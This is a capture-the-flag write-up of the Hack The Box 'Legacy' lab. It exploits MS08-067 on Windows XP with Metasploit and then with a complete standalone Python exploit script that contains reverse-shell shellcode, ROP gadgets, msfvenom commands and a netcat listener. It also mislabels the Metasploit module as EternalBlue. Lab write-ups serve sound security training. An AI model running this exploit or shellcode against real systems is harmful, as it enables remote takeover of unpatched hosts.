Today we are going to solve another CTF challenge “Legacy” which is lab presented by Hack the Box for making online penetration practices according to your experience level. They have collection of vulnerable labs as challenges from beginners to Expert level. HTB have two partitions of lab i.e. Active and retired since we can’t submit write up of any Active lab therefore we have chosen retried Legacy lab.
Level: Beginners
Task: find user.txt and root.txt file in victim’s machine.
Let’s start with a basic nmap scan
As we know in windows XP Port 445 was vulnerable to netapi exploit and it was a remarkable vulnerbality in SMB protcol.
root@kali:~/htb/legacy# nmap -sS -sV -Pn 10.10.10.4 Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-26 18:57 CET Nmap scan report for 10.10.10.4 Host is up (0.16s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds 3389/tcp closed ms-wbt-server Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 55.53 seconds
Let confirm SMB vulnerability in victims system using namp script.
root@kali:~/htb/legacy# nmap --script vuln -p445 10.10.10.4 Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-26 18:57 CET Pre-scan script results: | broadcast-avahi-dos: | Discovered hosts: | 224.0.0.251 | After NULL UDP avahi packet DoS (CVE-2011-1002). |_ Hosts are all up (not vulnerable). Stats: 0:00:45 elapsed; 0 hosts completed (0 up), 1 undergoing Ping Scan Parallel DNS resolution of 1 host. Timing: About 0.00% done Nmap scan report for 10.10.10.4 Host is up (0.027s latency). PORT STATE SERVICE 445/tcp open microsoft-ds Host script results: |_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED | smb-vuln-ms08-067: | VULNERABLE: | Microsoft Windows system vulnerable to remote code execution (MS08-067) | State: LIKELY VULNERABLE | IDs: CVE:CVE-2008-4250 | The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, | Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary | code via a crafted RPC request that triggers the overflow during path canonicalization. | | Disclosure date: 2008-10-23 | References: | https://technet.microsoft.com/en-us/library/security/ms08-067.aspx |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250 |_smb-vuln-ms10-054: false |_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug) | smb-vuln-ms17-010: | VULNERABLE: | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) | State: VULNERABLE | IDs: CVE:CVE-2017-0143 | Risk factor: HIGH | A critical remote code execution vulnerability exists in Microsoft SMBv1 | servers (ms17-010). | | Disclosure date: 2017-03-14 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx |_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/ Nmap done: 1 IP address (1 host up) scanned in 57.72 seconds
Then I run msfconsole command in terminal and load metasploit framework for using eternal blue module for exploiting target machine.
msf > use exploit/windows/smb/ms08_067_netapi msf exploit(windows/smb/ms08_067_netapi) > set rhost 10.10.10.4 rhost => 10.10.10.4 msf exploit(windows/smb/ms08_067_netapi) > check [+] 10.10.10.4:445 - The target is vulnerable. msf exploit(windows/smb/ms08_067_netapi) > exploit [*] Started reverse TCP handler on 10.10.14.13:4444 [*] 10.10.10.4:445 - Automatically detecting the target... [*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English [*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX) [*] 10.10.10.4:445 - Attempting to trigger the vulnerability... [*] Sending stage (179779 bytes) to 10.10.10.4 [*] Meterpreter session 1 opened (10.10.14.13:4444 -> 10.10.10.4:1211) at 2019-01-26 18:52:19 +0100 meterpreter > shell Process 808 created. Channel 1 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32>
Inside c:\Document and Setting \john \Desktop I found user.txt file
Inside c:\Document and Setting \Administrator\Desktop I found root.txt file
Without metasploit:
root@kali:~/htb# python MS08_067_2018.py 10.10.10.4 6 445 ####################################################################### # MS08-067 Exploit # This is a modified verion of Debasis Mohanty's code (https://www.exploit-db.com/exploits/7132/). # The return addresses and the ROP parts are ported from metasploit module exploit/windows/smb/ms08_067_netapi # # Mod in 2018 by Andy Acer # - Added support for selecting a target port at the command line. # - Changed library calls to allow for establishing a NetBIOS session for SMB transport # - Changed shellcode handling to allow for variable length shellcode. ####################################################################### $ This version requires the Python Impacket library version to 0_9_17 or newer. $ $ Here's how to upgrade if necessary: $ $ git clone --branch impacket_0_9_17 --single-branch https://github.com/CoreSecurity/impacket/ $ cd impacket $ pip install . ####################################################################### Windows XP SP3 English (NX) [-]Initiating connection [-]connected to ncacn_np:10.10.10.4[\pipe\browser] Exploit finish root@kali:~/htb#
code MS08_067_2018.py
#!/usr/bin/env python import struct import time import sys from threading import Thread # Thread is imported incase you would like to modify try: from impacket import smb from impacket import uuid #from impacket.dcerpc import dcerpc from impacket.dcerpc.v5 import transport except ImportError, _: print 'Install the following library to make this script work' print 'Impacket : https://github.com/CoreSecurity/impacket.git' print 'PyCrypto : https://pypi.python.org/pypi/pycrypto' sys.exit(1) print '#######################################################################' print '# MS08-067 Exploit' print '# This is a modified verion of Debasis Mohanty\'s code (https://www.exploit-db.com/exploits/7132/).' print '# The return addresses and the ROP parts are ported from metasploit module exploit/windows/smb/ms08_067_netapi' print '#' print '# Mod in 2018 by Andy Acer' print '# - Added support for selecting a target port at the command line.' print '# - Changed library calls to allow for establishing a NetBIOS session for SMB transport' print '# - Changed shellcode handling to allow for variable length shellcode.' print '#######################################################################\n' print (''' $ This version requires the Python Impacket library version to 0_9_17 or newer. $ $ Here's how to upgrade if necessary: $ $ git clone --branch impacket_0_9_17 --single-branch https://github.com/CoreSecurity/impacket/ $ cd impacket $ pip install . ''') print '#######################################################################\n' # ------------------------------------------------------------------------ # REPLACE THIS SHELLCODE with shellcode generated for your use # Note that length checking logic follows this section, so there's no need to count bytes or bother with NOPS. # # Example msfvenom commands to generate shellcode: # msfvenom -p windows/shell_bind_tcp RHOST=10.11.1.229 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows # msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.13 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows # msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.112 LPORT=62000 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows # Reverse TCP to 10.11.0.112 port 443: shellcode=( "\x2b\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e" "\x8e\xc8\x85\xbb\x83\xee\xfc\xe2\xf4\x72\x20\x07\xbb\x8e\xc8" "\xe5\x32\x6b\xf9\x45\xdf\x05\x98\xb5\x30\xdc\xc4\x0e\xe9\x9a" "\x43\xf7\x93\x81\x7f\xcf\x9d\xbf\x37\x29\x87\xef\xb4\x87\x97" "\xae\x09\x4a\xb6\x8f\x0f\x67\x49\xdc\x9f\x0e\xe9\x9e\x43\xcf" "\x87\x05\x84\x94\xc3\x6d\x80\x84\x6a\xdf\x43\xdc\x9b\x8f\x1b" "\x0e\xf2\x96\x2b\xbf\xf2\x05\xfc\x0e\xba\x58\xf9\x7a\x17\x4f" "\x07\x88\xba\x49\xf0\x65\xce\x78\xcb\xf8\x43\xb5\xb5\xa1\xce" "\x6a\x90\x0e\xe3\xaa\xc9\x56\xdd\x05\xc4\xce\x30\xd6\xd4\x84" "\x68\x05\xcc\x0e\xba\x5e\x41\xc1\x9f\xaa\x93\xde\xda\xd7\x92" "\xd4\x44\x6e\x97\xda\xe1\x05\xda\x6e\x36\xd3\xa0\xb6\x89\x8e" "\xc8\xed\xcc\xfd\xfa\xda\xef\xe6\x84\xf2\x9d\x89\x37\x50\x03" "\x1e\xc9\x85\xbb\xa7\x0c\xd1\xeb\xe6\xe1\x05\xd0\x8e\x37\x50" "\xeb\xde\x98\xd5\xfb\xde\x88\xd5\xd3\x64\xc7\x5a\x5b\x71\x1d" "\x12\xd1\x8b\xa0\x8f\xb1\x80\xc5\xed\xb9\x8e\xc9\x3e\x32\x68" "\xa2\x95\xed\xd9\xa0\x1c\x1e\xfa\xa9\x7a\x6e\x0b\x08\xf1\xb7" "\x71\x86\x8d\xce\x62\xa0\x75\x0e\x2c\x9e\x7a\x6e\xe6\xab\xe8" "\xdf\x8e\x41\x66\xec\xd9\x9f\xb4\x4d\xe4\xda\xdc\xed\x6c\x35" "\xe3\x7c\xca\xec\xb9\xba\x8f\x45\xc1\x9f\x9e\x0e\x85\xff\xda" "\x98\xd3\xed\xd8\x8e\xd3\xf5\xd8\x9e\xd6\xed\xe6\xb1\x49\x84" "\x08\x37\x50\x32\x6e\x86\xd3\xfd\x71\xf8\xed\xb3\x09\xd5\xe5" "\x44\x5b\x73\x65\xa6\xa4\xc2\xed\x1d\x1b\x75\x18\x44\x5b\xf4" "\x83\xc7\x84\x48\x7e\x5b\xfb\xcd\x3e\xfc\x9d\xba\xea\xd1\x8e" "\x9b\x7a\x6e" ) # ------------------------------------------------------------------------ # Gotta make No-Ops (NOPS) + shellcode = 410 bytes num_nops = 410 - len(shellcode) newshellcode = "\x90" * num_nops newshellcode += shellcode # Add NOPS to the front shellcode = newshellcode # Switcheroo with the newshellcode temp variable #print "Shellcode length: %s\n\n" % len(shellcode) nonxjmper = "\x08\x04\x02\x00%s" + "A" * 4 + "%s" + \ "A" * 42 + "\x90" * 8 + "\xeb\x62" + "A" * 10 disableNXjumper = "\x08\x04\x02\x00%s%s%s" + "A" * \ 28 + "%s" + "\xeb\x02" + "\x90" * 2 + "\xeb\x62" ropjumper = "\x00\x08\x01\x00" + "%s" + "\x10\x01\x04\x01"; module_base = 0x6f880000 def generate_rop(rvas): gadget1 = "\x90\x5a\x59\xc3" gadget2 = ["\x90\x89\xc7\x83", "\xc7\x0c\x6a\x7f", "\x59\xf2\xa5\x90"] gadget3 = "\xcc\x90\xeb\x5a" ret = struct.pack('<L', 0x00018000) ret += struct.pack('<L', rvas['call_HeapCreate'] + module_base) ret += struct.pack('<L', 0x01040110) ret += struct.pack('<L', 0x01010101) ret += struct.pack('<L', 0x01010101) ret += struct.pack('<L', rvas['add eax, ebp / mov ecx, 0x59ffffa8 / ret'] + module_base) ret += struct.pack('<L', rvas['pop ecx / ret'] + module_base) ret += gadget1 ret += struct.pack('<L', rvas['mov [eax], ecx / ret'] + module_base) ret += struct.pack('<L', rvas['jmp eax'] + module_base) ret += gadget2[0] ret += gadget2[1] ret += struct.pack('<L', rvas[ 'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret'] + module_base) ret += struct.pack('<L', rvas['pop ecx / ret'] + module_base) ret += gadget2[2] ret += struct.pack('<L', rvas['mov [eax+0x10], ecx / ret'] + module_base) ret += struct.pack('<L', rvas['add eax, 8 / ret'] + module_base) ret += struct.pack('<L', rvas['jmp eax'] + module_base) ret += gadget3 return ret class SRVSVC_Exploit(Thread): def __init__(self, target, os, port=445): super(SRVSVC_Exploit, self).__init__() # MODIFIED HERE # Changed __port to port ... not sure if that does anything. I'm a newb. self.port = port self.target = target self.os = os def __DCEPacket(self): if (self.os == '1'): print 'Windows XP SP0/SP1 Universal\n' ret = "\x61\x13\x00\x01" jumper = nonxjmper % (ret, ret) elif (self.os == '2'): print 'Windows 2000 Universal\n' ret = "\xb0\x1c\x1f\x00" jumper = nonxjmper % (ret, ret) elif (self.os == '3'): print 'Windows 2003 SP0 Universal\n' ret = "\x9e\x12\x00\x01" # 0x01 00 12 9e jumper = nonxjmper % (ret, ret) elif (self.os == '4'): print 'Windows 2003 SP1 English\n' ret_dec = "\x8c\x56\x90\x7c" # 0x7c 90 56 8c dec ESI, ret @SHELL32.DLL ret_pop = "\xf4\x7c\xa2\x7c" # 0x 7c a2 7c f4 push ESI, pop EBP, ret @SHELL32.DLL jmp_esp = "\xd3\xfe\x86\x7c" # 0x 7c 86 fe d3 jmp ESP @NTDLL.DLL disable_nx = "\x13\xe4\x83\x7c" # 0x 7c 83 e4 13 NX disable @NTDLL.DLL jumper = disableNXjumper % ( ret_dec * 6, ret_pop, disable_nx, jmp_esp * 2) elif (self.os == '5'): print 'Windows XP SP3 French (NX)\n' ret = "\x07\xf8\x5b\x59" # 0x59 5b f8 07 disable_nx = "\xc2\x17\x5c\x59" # 0x59 5c 17 c2 # the nonxjmper also work in this case. jumper = nonxjmper % (disable_nx, ret) elif (self.os == '6'): print 'Windows XP SP3 English (NX)\n' ret = "\x07\xf8\x88\x6f" # 0x6f 88 f8 07 disable_nx = "\xc2\x17\x89\x6f" # 0x6f 89 17 c2 # the nonxjmper also work in this case. jumper = nonxjmper % (disable_nx, ret) elif (self.os == '7'): print 'Windows XP SP3 English (AlwaysOn NX)\n' rvasets = {'call_HeapCreate': 0x21286, 'add eax, ebp / mov ecx, 0x59ffffa8 / ret': 0x2e796, 'pop ecx / ret': 0x2e796 + 6, 'mov [eax], ecx / ret': 0xd296, 'jmp eax': 0x19c6f, 'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret': 0x10a56, 'mov [eax+0x10], ecx / ret': 0x10a56 + 6, 'add eax, 8 / ret': 0x29c64} # the nonxjmper also work in this case. jumper = generate_rop(rvasets) + "AB" else: print 'Not supported OS version\n' sys.exit(-1) print '[-]Initiating connection' # MORE MODIFICATIONS HERE ############################################################################################# if (self.port == '445'): self.__trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % self.target) else: # DCERPCTransportFactory doesn't call SMBTransport with necessary parameters. Calling directly here. # *SMBSERVER is used to force the library to query the server for its NetBIOS name and use that to # establish a NetBIOS Session. The NetBIOS session shows as NBSS in Wireshark. self.__trans = transport.SMBTransport(remoteName='*SMBSERVER', remote_host='%s' % self.target, dstport = int(self.port), filename = '\\browser' ) self.__trans.connect() print '[-]connected to ncacn_np:%s[\\pipe\\browser]' % self.target self.__dce = self.__trans.DCERPC_class(self.__trans) self.__dce.bind(uuid.uuidtup_to_bin( ('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0'))) path = "\x5c\x00" + "ABCDEFGHIJ" * 10 + shellcode + "\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00" + \ "\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00" + jumper + "\x00" * 2 server = "\xde\xa4\x98\xc5\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00\x00\x00" prefix = "\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5c\x00\x00\x00" # NEW HOTNESS # The Path Length and the "Actual Count" SMB parameter have to match. Path length in bytes # is double the ActualCount field. MaxCount also seems to match. These fields in the SMB protocol # store hex values in reverse byte order. So: 36 01 00 00 => 00 00 01 36 => 310. No idea why it's "doubled" # from 310 to 620. 620 = 410 shellcode + extra stuff in the path. MaxCount = "\x36\x01\x00\x00" # Decimal 310. => Path length of 620. Offset = "\x00\x00\x00\x00" ActualCount = "\x36\x01\x00\x00" # Decimal 310. => Path length of 620 self.__stub = server + MaxCount + Offset + ActualCount + \ path + "\xE8\x03\x00\x00" + prefix + "\x01\x10\x00\x00\x00\x00\x00\x00" return def run(self): self.__DCEPacket() self.__dce.call(0x1f, self.__stub) time.sleep(3) print 'Exploit finish\n' if __name__ == '__main__': try: target = sys.argv[1] os = sys.argv[2] port = sys.argv[3] except IndexError: print '\nUsage: %s <target ip> <os #> <Port #>\n' % sys.argv[0] print 'Example: MS08_067_2018.py 192.168.1.1 1 445 -- for Windows XP SP0/SP1 Universal, port 445' print 'Example: MS08_067_2018.py 192.168.1.1 2 139 -- for Windows 2000 Universal, port 139 (445 could also be used)' print 'Example: MS08_067_2018.py 192.168.1.1 3 445 -- for Windows 2003 SP0 Universal' print 'Example: MS08_067_2018.py 192.168.1.1 4 445 -- for Windows 2003 SP1 English' print 'Example: MS08_067_2018.py 192.168.1.1 5 445 -- for Windows XP SP3 French (NX)' print 'Example: MS08_067_2018.py 192.168.1.1 6 445 -- for Windows XP SP3 English (NX)' print 'Example: MS08_067_2018.py 192.168.1.1 7 445 -- for Windows XP SP3 English (AlwaysOn NX)' print '' print 'FYI: nmap has a good OS discovery script that pairs well with this exploit:' print 'nmap -p 139,445 --script-args=unsafe=1 --script /usr/share/nmap/scripts/smb-os-discovery 192.168.1.1' print '' sys.exit(-1) current = SRVSVC_Exploit(target, os, port) current.start()
root@kali:~/htb# nc -lvp 443 listening on [any] 443 ... 10.10.10.4: inverse host lookup failed: Unknown host connect to [10.10.14.13] from (UNKNOWN) [10.10.10.4] 1031 Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32>hostname hostname legacy C:\WINDOWS\system32>ipconfig ipconfig Windows IP Configuration Ethernet adapter Local Area Connection: Connection-specific DNS Suffix . : IP Address. . . . . . . . . . . . : 10.10.10.4 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 10.10.10.2 C:\WINDOWS\system32>
Author: Puckiestyle